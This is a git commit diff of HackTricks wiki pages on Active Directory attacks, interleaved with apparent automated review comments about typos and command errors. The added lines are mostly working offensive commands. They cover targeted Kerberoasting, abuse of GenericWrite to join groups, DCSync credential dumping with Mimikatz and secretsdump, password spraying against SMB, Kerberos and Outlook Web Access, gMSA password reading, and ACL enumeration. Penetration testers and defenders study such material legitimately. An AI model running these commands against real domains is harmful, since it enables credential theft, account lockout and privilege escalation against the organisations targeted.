mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 04:33:28 +00:00
GitBook: [#3566] No subject
This commit is contained in:
parent
84ce66239c
commit
19efef6a05
8 changed files with 204 additions and 122 deletions
@ -12,7 +12,7 @@

</details>

**This information was copied from** [**https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces) **because it's just perfect**
**This information was mostly copied from** [**https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces) **because it's just perfect**

## Context

@ -36,6 +36,8 @@ Some of the Active Directory object permissions and types that we as attackers a

In this lab, we are going to explore and try to exploit most of the above ACEs.

It's worth familiarizing yourself with all of the [BloodHound edges](https://bloodhound.readthedocs.io/en/latest/data-analysis/edges.html) and as many Active Directory [Extended Rights](https://learn.microsoft.com/en-us/windows/win32/adschema/extended-rights) as possible as you never know when you may encounter a less common one during an assessment.

## GenericAll on User

Using powerview, let's check if our attacking user `spotless` has `GenericAll rights` on the AD object for the user `delegate`:
@ -56,7 +58,16 @@ We can see that indeed our user `spotless` has the `GenericAll` rights, effectiv
* **Targeted Kerberoasting**: You could make the user **kerberoastable** setting an **SPN** on the account, kerberoast it and attempt to crack offline:

```powershell
Set-DomainObject -Identity <username> -Set @{serviceprincipalname="fake/NOTHING"}r
# Set SPN
Set-DomainObject -Credential $creds -Identity <username> -Set @{serviceprincipalname="fake/NOTHING"}
# Get Hash
.\Rubeus.exe kerberoast /user:<username> /nowrap
# Clean SPN
Set-DomainObject -Credential $creds -Identity <username> -Clear serviceprincipalname -Verbose

# You can also use the tool https://github.com/ShutdownRepo/targetedKerberoast
# to get hashes of one or all the users
python3 targetedKerberoast.py -domain.local -u <username> -p password -v
```
* **Targeted ASREPRoasting**: You could make the user **ASREPRoastable** by **disabling** **preauthentication** and then ASREProast it.

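Review bot: `$creds` is used on the `# Set SPN` and `# Clean SPN` lines but is never defined in this block; either add the `ConvertTo-SecureString` / `New-Object ... PSCredential` lines that the `GenericWrite on Group` block in this same commit uses, or drop `-Credential $creds` as the replaced line did (that old line also carried a stray trailing `r`, which this change rightly removes). The last command, `python3 targetedKerberoast.py -domain.local -u <username> -p password -v`, looks mistyped: the domain value has no flag in front of it (the tool takes `-d domain.local`), and `password` should be a placeholder such as `<password>` to match the other arguments. Finally, `-Clear serviceprincipalname` wipes every SPN on the account, not just the `fake/NOTHING` value set two lines earlier, so if the account had legitimate SPNs the "cleanup" breaks them; the text should say to record the original value and restore it instead.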
@ -237,6 +248,22 @@ Below shows the user's ~~`delegate`~~ logon script field got updated in the AD:

![](../../.gitbook/assets/21.png)

## GenericWrite on Group

This allows you to set as members of the group new users (yourself for example):

```powershell
# Create creds
$pwd = ConvertTo-SecureString 'JustAWeirdPwd!$' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('DOMAIN\username', $pwd)
# Add user to group
Add-DomainGroupMember -Credential $creds -Identity 'Group Name' -Members 'username' -Verbose
# Check user was added
Get-DomainGroupMember -Identity "Group Name" | Select MemberName
# Remove group member
Remove-DomainGroupMember -Credential $creds -Identity "Group Name" -Members 'username' -Verbose
```

## WriteDACL + WriteOwner

If you are the owner of a group, like I'm the owner of a `Test` AD group:

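Review bot: the `# Check user was added` line calls `Get-DomainGroupMember` without the `-Credential $creds` that the add and remove lines pass, so it queries as the current session user rather than the principal that holds GenericWrite; add `-Credential $creds` for consistency. The intro sentence 'This allows you to set as members of the group new users (yourself for example):' reads awkwardly; suggest 'This allows you to add new members (yourself, for example) to the group:'. The snippet also alternates between `'Group Name'` and `"Group Name"` quoting; pick one.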
@ -481,15 +508,11 @@ Additionally, we could think about leveraging logon/logoff scripts, using regist

## References

{% embed url="https://wald0.com/?p=112" %}

{% embed url="https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=netframework-4.7.2" %}

{% embed url="https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/" %}

{% embed url="https://adsecurity.org/?p=3658" %}

{% embed url="https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System_DirectoryServices_ActiveDirectoryAccessRule__ctor_System_Security_Principal_IdentityReference_System_DirectoryServices_ActiveDirectoryRights_System_Security_AccessControl_AccessControlType_" %}
* [https://wald0.com/?p=112](https://wald0.com/?p=112)
* [https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=netframework-4.7.2](https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=netframework-4.7.2)
* [https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/)
* [https://adsecurity.org/?p=3658](https://adsecurity.org/?p=3658)
* [https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System\_DirectoryServices\_ActiveDirectoryAccessRule\_\_ctor\_System\_Security\_Principal\_IdentityReference\_System\_DirectoryServices\_ActiveDirectoryRights\_System\_Security\_AccessControl\_AccessControlType\_](https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System\_DirectoryServices\_ActiveDirectoryAccessRule\_\_ctor\_System\_Security\_Principal\_IdentityReference\_System\_DirectoryServices\_ActiveDirectoryRights\_System\_Security\_AccessControl\_AccessControlType\_)

<details>

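Review bot: the new bullets repeat the full URL as both link text and target, which for the last entry (the `ActiveDirectoryAccessRule` constructor page) produces a line of roughly 600 characters; a short descriptive label in the text part would keep the list readable while the target stays unchanged. The ired.team page that the top of this file credits as its source is not in this list either; it belongs here.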
@ -34,33 +34,46 @@ The **DCSync** permission implies having these permissions over the domain itsel

Check who has these permissions using `powerview`:

```bash
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')}
```powershell
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}
```

### Exploit Locally

```bash
```powershell
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
```

### Exploit Remotely

```bash
secretsdump.py -just-dc <user>:<password>@<ipaddress>
```powershell
secretsdump.py -just-dc <user>:<password>@<ipaddress> -outputfile dcsync_hashes
[-just-dc-user <USERNAME>] #To get only of that user
[-pwd-last-set] #To see when each account's password was last changed
[-history] #To dump password history, may be helpful for offline password cracking
```

 `-just-dc` generates 3 files:

* one with the **NTLM hashes**
* one withe the **Kerberos keys**
* one with cleartext passwords from the NTDS for any accounts set with [**reversible encryption**](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption) **** enabled. You can get users with reversible encryption with 

```powershell
Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol
```

### Persistence

If you are a domain admin, you can grant this permissions to any user with the help of `powerview`:

```bash
```powershell
Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName username -Rights DCSync -Verbose
```

Then, you can **check if the user was correctly assigned** the 3 privileges looking for them in the output of (you should be able to see the names of the privileges inside the "ObjectType" field):

```bash
```powershell
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{$_.IdentityReference -match "student114"}
```

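Review bot: the `### Exploit Remotely` fence is retagged from ```bash to ```powershell, but `secretsdump.py` is an impacket script normally run from a Linux shell, so ```bash was the right tag there (the retag is correct for the `Get-ObjectAcl`, `Invoke-Mimikatz` and `Add-ObjectAcl` blocks). The three bracketed option lines added under it (`[-just-dc-user <USERNAME>] #To get only of that user` and the two that follow) are not runnable as written; either fold them into the command or prefix them with `#` so a copy-paste of the block does not fail. Adding `WriteDacl` to the `Get-ObjectAcl` filter is a good catch, since a principal with WriteDacl on the domain object can grant itself the replication rights and so belongs in the same audit. Typos to fix on the touched lines: 'one withe the Kerberos keys', 'grant this permissions', and the sentence 'You can get users with reversible encryption with' that ends without a colon before the fence.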
@ -71,7 +84,10 @@ Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveG
* Security Event ID 4670 (Audit Policy for object must be enabled) – Permissions on an object were changed
* AD ACL Scanner - Create and compare create reports of ACLs. [https://github.com/canix1/ADACLScanner](https://github.com/canix1/ADACLScanner)

[**More information about DCSync in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync) [**More information about DCSync**](https://yojimbosecurity.ninja/dcsync/)
## References

* [https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync)
* [https://yojimbosecurity.ninja/dcsync/](https://yojimbosecurity.ninja/dcsync/)

<details>

@ -4,11 +4,15 @@

<summary><strong>Support HackTricks and get benefits!</strong></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!

- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)

- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**

- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**

</details>

@ -23,74 +27,37 @@ Notice that you **could lockout some accounts if you try several wrong passwords

### Get password policy

If you have some user credentials or a shell as a domain user you can **get the password policy with**:
If you have some user credentials or a shell as a domain user you can get the password policy with:

```bash
# From Linux
crackmapexec <IP> -u 'user' -p 'password' --pass-pol
* `crackmapexec <IP> -u 'user' -p 'password' --pass-pol`
* `enum4linx -u 'username' -p 'password' -P <IP>`
* `(Get-DomainPolicy)."SystemAccess" #From powerview`

enum4linx -u 'username' -p 'password' -P <IP>
### Exploitation

rpcclient -U "" -N 10.10.10.10;
rpcclient $>querydominfo

ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

# From Windows
net accounts

(Get-DomainPolicy)."SystemAccess" #From powerview
```

### Exploitation from Linux (or all)

* Using **crackmapexec:**
Using **crackmapexec:**

```bash
crackmapexec smb <IP> -u users.txt -p passwords.txt
# Local Auth Spray (once you found some local admin pass or hash)
## --local-auth flag indicate to only try 1 time per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +
```

* Using [**kerbrute**](https://github.com/ropnop/kerbrute) **** (Go)

```bash
# Password Spraying
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123
# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman
```

* [_**spray**_](https://github.com/Greenwolf/Spray) _**(you can indicate number of attempts to avoid lockouts):**_

```bash
spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
```

* Using [**kerbrute**](https://github.com/TarlogicSecurity/kerbrute) (python) - NOT RECOMMENDED SOMETIMES DOESN'T WORK
Using [kerbrute](https://github.com/TarlogicSecurity/kerbrute)(python) - NOT RECOMMENDED SOMETIMES DOESN'T WORK

```bash
python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt
```

* With the `scanner/smb/smb_login` module of **Metasploit**:
**Kerbrute** also tells if a username is valid.

![](<../../.gitbook/assets/image (132) (1).png>)

* Using **rpcclient**:
Using [kerbrute](https://github.com/ropnop/kerbrute)(Go)

```bash
# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/
for u in $(cat users.txt); do
rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
done
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman
```

#### From Windows

* With [Rubeus](https://github.com/Zer1t0/Rubeus) version with brute module:
With [Rubeus](https://github.com/Zer1t0/Rubeus) version with brute module:

```bash
# with a list of users

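Review bot: the `### Get password policy` rewrite drops `net accounts`, `rpcclient -U "" -N ... querydominfo` and the `ldapsearch ... pwdHistoryLength` commands from the old block without a replacement, so the Windows-side and the unauthenticated ways of reading the lockout policy disappear; keep at least `net accounts` next to the powerview one-liner. Defects carried over that are worth fixing while these lines are being rewritten: `enum4linx` should be `enum4linux`; `crackmapexec <IP> -u 'user' -p 'password' --pass-pol` is missing the `smb` protocol argument that the later `crackmapexec smb <IP> -u users.txt -p passwords.txt` line uses; the comment `## --local-auth flag indicate to only try 1 time per machine` misdescribes the flag, which makes CrackMapExec authenticate against the local SAM instead of the domain; and the sample hash `10298e182387f9cab376ecd08491764a0` is 33 hex digits, one more than an NT hash, so readers will assume it is valid input.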
@ -100,21 +67,31 @@ done
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
```

* With [**Invoke-DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1) (It can generate users from the domain by default and it will get the password policy from the domain and limit tries according to it):
With the `scanner/smb/smb_login` module of Metasploit:

```powershell
![](<../../.gitbook/assets/image (132) (1).png>)

With [Invoke-DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1)

```bash
Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
```

* With [**Invoke-SprayEmptyPassword.ps1**](https://github.com/S3cur3Th1sSh1t/Creds/blob/master/PowershellScripts/Invoke-SprayEmptyPassword.ps1)****
or **spray** (read next section).

```
Invoke-SprayEmptyPassword
### Lockout check

The best way is not to try with more than 5/7 passwords per account.

So you have to be very careful with password spraying because you could lockout accounts. To brute force taking this into mind, you can use [_**spray**_](https://github.com/Greenwolf/Spray)_**:**_

```bash
spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
```

## Outlook Web Access

There are multiples tools for p**assword spraying outlook**.
There are multiples tools for password spraying outlook.

* With [MSF Owa\_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa\_login/)
* with [MSF Owa\_ews\_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa\_ews\_login/)
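Review bot: the `Invoke-SprayEmptyPassword` snippet opens an untagged fence (```) while the neighbouring blocks are tagged ```powershell, and its closing fence is not visible in this hunk; check the rendered page for a code block that swallows the `### Lockout check` heading. The bullet text for it ends with a stray `****`, an empty bold span from the GitBook export that renders as literal asterisks. The old `### Lockout check` paragraph, with its 'not more than 5/7 passwords per account' guidance, appears to be removed here; the restructured `spray` bullet keeps the tool but not the limit, so the caution about locking real users out is weaker than before and deserves a sentence of its own. Also 'There are multiples tools' should read 'There are multiple tools'.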
@ -125,25 +102,25 @@ There are multiples tools for p**assword spraying outlook**.
To use any of these tools, you need a user list and a password / a small list of passwords to spray.

```bash
./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
$ ./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
[x] Failed: larsson:Summer2020
[x] Failed: cube0x0:Summer2020
[x] Failed: a.admin:Summer2020
[x] Failed: c.cube:Summer2020
[+] Success: s.svensson:Summer2020
[x] Failed: s.sven:Summer2020
[x] Failed: j.jenny:Summer2020
[x] Failed: t.teresa:Summer2020
[x] Failed: t.trump:Summer2020
[x] Failed: a.adams:Summer2020
[x] Failed: l.larsson:Summer2020
[x] Failed: CUBE0X0:Summer2020
[x] Failed: A.ADMIN:Summer2020
[x] Failed: C.CUBE:Summer2020
[+] Success: S.SVENSSON:Summer2020
```

## Google

* [https://github.com/ustayready/CredKing/blob/master/credking.py](https://github.com/ustayready/CredKing/blob/master/credking.py)

## Okta

* [https://github.com/ustayready/CredKing/blob/master/credking.py](https://github.com/ustayready/CredKing/blob/master/credking.py)
* [https://github.com/Rhynorater/Okta-Password-Sprayer](https://github.com/Rhynorater/Okta-Password-Sprayer)
* [https://github.com/knavesec/CredMaster](https://github.com/knavesec/CredMaster)

## References
## References :

* [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying)
* [https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell](https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell)
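Review bot: the `$ ` prompt added in front of the ruler command makes it the only prompted command on the page; every other fence shows bare commands, so either drop it or apply the convention throughout. `## References :` to `## References` is a good fix.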
@ -154,10 +131,14 @@ To use any of these tools, you need a user list and a password / a small list of

<summary><strong>Support HackTricks and get benefits!</strong></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!

- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)

- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**

- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**

</details>

@ -261,8 +261,11 @@ As detailed in this [**post**](http://www.labofapenetrationtester.com/2017/05/ab

Another way to **abuse DnsAdmins** group privileges is by creating a **WPAD record**. Membership in this group gives us the rights to [disable global query block security](https://docs.microsoft.com/en-us/powershell/module/dnsserver/set-dnsserverglobalqueryblocklist?view=windowsserver2019-ps), which by default blocks this attack. Server 2008 first introduced the ability to add to a global query block list on a DNS server. By default, Web Proxy Automatic Discovery Protocol (WPAD) and Intra-site Automatic Tunnel Addressing Protocol (ISATAP) are on the global query block list. These protocols are quite vulnerable to hijacking, and any domain user can create a computer object or DNS record containing those names.

After **disabling the global query** block list and creating a **WPAD record**, **every machine** running WPAD with default settings will have its **traffic proxied through our attack machine**. We could use a tool such as **** [**Responder**](https://github.com/lgandx/Responder) **or** [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) **to perform traffic spoofing**, and attempt to capture password hashes and crack them offline or perform an SMBRelay attack.\
After **disabling the global query** block list and creating a **WPAD record**, **every machine** running WPAD with default settings will have its **traffic proxied through our attack machine**. We could use a tool such as **** [**Responder**](https://github.com/lgandx/Responder) **or** [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) **to perform traffic spoofing**, and attempt to capture password hashes and crack them offline or perform an SMBRelay attack.

{% content-ref url="../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md" %}
[spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
{% endcontent-ref %}

## **AD Recycle Bin**

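Review bot: dropping the trailing `\` (a GitBook hard line break) is fine, but the rewritten line still carries `**** ` in front of `[**Responder**]`, an empty bold span that renders as literal asterisks; remove it while this line is being edited.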
@ -324,25 +327,6 @@ C:\htb> sc.exe start MozillaMaintenance
This vector has been mitigated by the March 2020 Windows security updates, which changed behavior relating to hard links.
{% endhint %}

## Group Managed Service Accounts (gMSA)

In most of the infrastructures, service accounts are typical user accounts with “**Password never expire**” option. Maintaining these accounts could be a real mess and that's why Microsoft introduced **Managed Service Accounts:**

* No more password management. It uses a complex, random, 240-character password and changes that automatically when it reaches the domain or computer password expire date.
* It is uses Microsoft Key Distribution Service (KDC) to create and manage the passwords for the gMSA.
* It cannot be lock out or use for interactive login
* Supports to share across multiple hosts
* Can use to run schedule tasks (Managed service accounts do not support to run schedule tasks)
* Simplified SPN Management – System will automatically change the SPN value if **sAMaccount** details of the computer change or DNS name property change.

gMSA accounts have their passwords stored in a LDAP property called _**msDS-ManagedPassword**_ which **automatically** get **resets** by the DC’s every 30 days, are **retrievable** by **authorized administrators** and by the **servers** who they are installed on. _**msDS-ManagedPassword**_ is an encrypted data blob called [MSDS-MANAGEDPASSWORD\_BLOB](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e) and it’s only retrievable when the connection is secured, **LDAPS** or when the authentication type is ‘Sealing & Secure’ for an example.

![Image from https://cube0x0.github.io/Relaying-for-gMSA/](../../.gitbook/assets/asd1.png)

So, if gMSA is being used, find if it has **special privileges** and also check if you have **permissions** to **read** the password of the services.

Also, check this [web page](https://cube0x0.github.io/Relaying-for-gMSA/) about how to perform a **NTLM relay attack** to **read** the **password** of **gMSA**.

## References <a href="#references" id="references"></a>

{% embed url="https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges" %}

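Review bot: this cuts the whole gMSA section from this file; the same text is re-added in a later hunk of this commit with the image path changed from `../../.gitbook/assets/asd1.png` to `../.gitbook/assets/asd1.png`, which matches the new file depth. Any page that linked to the section at its old location needs repointing, otherwise the move leaves dangling links.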
@ -149,6 +149,31 @@ This way requires the **victim user** to be **running** a **process** inside the

{% embed url="https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files" %}

## Group Managed Service Accounts (gMSA)

In most of the infrastructures, service accounts are typical user accounts with “**Password never expire**” option. Maintaining these accounts could be a real mess and that's why Microsoft introduced **Managed Service Accounts:**

* No more password management. It uses a complex, random, 240-character password and changes that automatically when it reaches the domain or computer password expire date.
* It is uses Microsoft Key Distribution Service (KDC) to create and manage the passwords for the gMSA.
* It cannot be lock out or use for interactive login
* Supports to share across multiple hosts
* Can use to run schedule tasks (Managed service accounts do not support to run schedule tasks)
* Simplified SPN Management – System will automatically change the SPN value if **sAMaccount** details of the computer change or DNS name property change.

gMSA accounts have their passwords stored in a LDAP property called _**msDS-ManagedPassword**_ which **automatically** get **resets** by the DC’s every 30 days, are **retrievable** by **authorized administrators** and by the **servers** who they are installed on. _**msDS-ManagedPassword**_ is an encrypted data blob called [MSDS-MANAGEDPASSWORD\_BLOB](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e) and it’s only retrievable when the connection is secured, **LDAPS** or when the authentication type is ‘Sealing & Secure’ for an example.

![Image from https://cube0x0.github.io/Relaying-for-gMSA/](../.gitbook/assets/asd1.png)

So, if gMSA is being used, find if it has **special privileges** and also check if you have **permissions** to **read** the password of the services.

You can read this password with [**GMSAPasswordReader**](https://github.com/rvazarkar/GMSAPasswordReader)**:**

```
/GMSAPasswordReader --AccountName jkohler
```

Also, check this [web page](https://cube0x0.github.io/Relaying-for-gMSA/) about how to perform a **NTLM relay attack** to **read** the **password** of **gMSA**.

## LAPS

****[**Local Administrator Password Solution (LAPS)**](https://www.microsoft.com/en-us/download/details.aspx?id=46899) allows you to **manage the local Administrator password** (which is **randomised**, unique, and **changed regularly**) on domain-joined computers. These passwords are centrally stored in Active Directory and restricted to authorised users using ACLs. If your user is given enough permissions you might be able to read the passwords of the local admins.

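Review bot: `/GMSAPasswordReader --AccountName jkohler` has a leading `/` that is neither a path nor a PowerShell invocation; it should be `.\GMSAPasswordReader.exe --AccountName jkohler`, the fence should be tagged ```powershell like the others, and `jkohler` should be shown as a placeholder such as `<gMSA name>` so it is not read as a real account. In the moved text, 'Microsoft Key Distribution Service (KDC)' conflates two things: the service that derives gMSA passwords is the Key Distribution Service (KDS), while the KDC is the Kerberos Key Distribution Center. Since the text is being moved anyway, fix the grammar it carries: 'It is uses', 'cannot be lock out or use for interactive login', 'Supports to share across', 'Can use to run schedule tasks', and 'get resets by the DC's'.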
File diff suppressed because one or more lines are too long
@ -87,6 +87,8 @@ Get-NetUser -UserName student107 #Get info about a user
Get-NetUser -properties name, description #Get all descriptions
Get-NetUser -properties name, pwdlastset, logoncount, badpwdcount #Get all pwdlastset, logoncount and badpwdcount
Find-UserField -SearchField Description -SearchTerm "built" #Search account with "something" in a parameter
# Get users with reversible encryption (PWD in clear text with dcsync)
Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol

# Users Filters
Get-NetUser -UACFilter NOT_ACCOUNTDISABLE -properties distinguishedname #All enabled users
@ -186,11 +188,24 @@ Learn how to **exploit permissions over GPOs and ACLs** in:
### ACL

```bash
Get-ObjectAcl -SamAccountName <username> -ResolveGUIDs #Get ACLs of an object (permissions of other objects over the indicated one)
Get-PathAcl -Path "\\dc.mydomain.local\sysvol" #Get permissions of a file
Find-InterestingDomainAcl -ResolveGUIDs #Find intresting ACEs (Interesting permisions of "unexpected objects" (RID>1000 and modify permissions) over other objects
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReference -match "RDPUsers"} #Check if any of the interesting permissions founds is realated to a username/group
Get-NetGroupMember -GroupName "Administrators" -Recurse | ?{$_.IsGroup -match "false"} | %{Get-ObjectACL -SamAccountName $_.MemberName -ResolveGUIDs} | select ObjectDN, IdentityReference, ActiveDirectoryRights #Get special rights over All administrators in domain
#Get ACLs of an object (permissions of other objects over the indicated one)
Get-ObjectAcl -SamAccountName <username> -ResolveGUIDs

#Other way to get ACLs of an object
$sid = Convert-NameToSid <username/group>
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}

#Get permissions of a file
Get-PathAcl -Path "\\dc.mydomain.local\sysvol"

#Find intresting ACEs (Interesting permisions of "unexpected objects" (RID>1000 and modify permissions) over other objects
Find-InterestingDomainAcl -ResolveGUIDs

#Check if any of the interesting permissions founds is realated to a username/group
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReference -match "RDPUsers"}

#Get special rights over All administrators in domain
Get-NetGroupMember -GroupName "Administrators" -Recurse | ?{$_.IsGroup -match "false"} | %{Get-ObjectACL -SamAccountName $_.MemberName -ResolveGUIDs} | select ObjectDN, IdentityReference, ActiveDirectoryRights
```

### Shared files and folders
